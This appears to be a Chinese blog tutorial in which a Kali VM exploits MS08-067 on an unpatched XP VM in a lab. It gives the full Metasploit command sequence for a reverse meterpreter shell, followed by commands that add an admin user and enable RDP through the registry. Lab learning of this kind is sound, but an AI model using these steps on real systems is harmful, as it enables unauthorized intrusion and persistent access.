Metasploit的一次尝试ms08_067

时间:2024-05-21 11:55:22

实验准备:1.VM虚拟机中Linux Kali攻击机、没有打过补丁的xp系统(同时关闭防火墙)、

  kali IP:192.168.19.137

  xp IP:192.168.19.144

  在进行漏洞渗透攻击之前先确定两者是否在同一网段,

  xp打开命令框输入:xp中输入ipconfigMetasploit的一次尝试ms08_067

  kali中输入:ifconfigMetasploit的一次尝试ms08_067

  可以看到二者在同一网段。如果二者不在同一网段可以通过虚拟机网络设置统一设置为NAT模式链接。

  在kali命令框输入命令查看连接情况。:ping xp ipMetasploit的一次尝试ms08_067

成功完成上述步骤则可进行漏洞渗透攻击。

1:打开metasploit中的msfconsole框架Metasploit的一次尝试ms08_067

2.使用ms08_067模块,通过命令:use exploit/windows/smb/ms08_067_netapi

  如果不清楚ms08_067_067_netapi的路径可通过命令:search ms08_067_067_netapi  查找路径Metasploit的一次尝试ms08_067

3:设置模块中的参数与加载一枚payload
    首先我们可以使用show options 来查看所需要设置的参数

  命令:show options

Metasploit的一次尝试ms08_067

4.设置参数

命令:set RHOST 被攻击者ip

           set LHOST 攻击者ip

Metasploit的一次尝试ms08_067

5.设置完成后可进行攻击 

命令:exploit

反弹一个meterpreter就表示攻击成功此时输入shell就可调用系统的cmd命令框了。Metasploit的一次尝试ms08_067

6.可通过命令添加用户:net user 用户名 密码 /add

通过net user 命令查看刚才设置的用户。

Metasploit的一次尝试ms08_067

7.通过命令进行提权:net localgroup administrators 用户名 /add

8.通过命令打开3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


查看端口开放
9.进行远程连接